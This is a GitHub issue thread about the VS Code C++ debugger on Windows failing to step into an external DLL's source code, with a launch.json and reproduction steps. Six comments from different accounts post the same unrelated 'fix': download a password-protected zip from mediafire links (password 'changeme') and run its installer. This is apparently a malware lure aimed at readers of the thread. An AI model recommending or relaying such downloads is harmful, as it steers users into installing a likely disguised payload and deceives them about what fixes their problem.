### ISSUE TITLE
VScode debugger on Windows cann't step in external source code

### ISSUE THREAD

**Issue by yangwang201911** [microsoft/vscode#226602]
Does this issue occur when all extensions are disabled?: Yes/No

- VS Code Version: 1.92.2(fee1edb8d6d72a0ddff41e5f71a671c23ed924b9)
- OS Version: Windows_NT x64 10.0.22631
Steps to Reproduce:

1. create a main.cpp and configure with CMake to link external DLL with debug verion
2. build main.cpp with debug version
3. create launch.json and enable debug section with blow setting
```
{
            "name": "(Windows) Launch",
            "type": "cppvsdbg",
            "request": "launch",
            "program": "${workspaceFolder}/my.exe",
            "args": [ ],
            "cwd": "${fileDirname}",
            "symbolSearchPath": "C:/Path/to/external/*.pdb/"
}
```
4. create breakpoint in main.cpp
5. create breakpoint in the source code from external DLL with debug version
6. start debug with "(Windows) Launch"
7. successfully stop at the breakpoint of main.cpp, while failed to step in the source code of external DLL, and the location of the external breakpoint has changed to the location of VScode installation location of the system. 
expected stop point:
           `C:\path\to\my\external\souce\code\cpp\file`
actual stop point:
            `C:\Users\myuser\AppData\Local\Programs\Microsoft VS Code\my\external\souce\code\cpp\file`
Not sure if it is a bug or issue.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by roblourens** [comment]
Please file this on the repo for the debug extension
